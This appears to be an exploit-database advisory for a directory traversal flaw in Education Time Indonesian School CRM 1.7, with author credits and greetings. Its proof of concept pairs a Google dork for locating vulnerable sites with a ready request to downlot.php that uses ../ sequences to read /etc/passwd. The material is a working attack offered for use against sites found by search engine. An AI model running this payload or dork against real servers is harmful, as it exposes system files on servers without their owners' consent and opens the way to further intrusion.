Headline
Education Time Indonesian School CRM 1.7 Directory Traversal
Education Time Indonesian School CRM version 1.7 suffers from a directory traversal vulnerability.
====================================================================================================================================| # Title : Education Time Indonesian School CRM v 1.7 Directory Traversal Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) || # Vendor : http://p30vel.ir | | # Dork : "media.php?module=detailberita&id=" |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : downlot.php?file=../../../../../../../../../../etc/passwd[+] http://target_site/unit/spi/downlot.php?file=../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================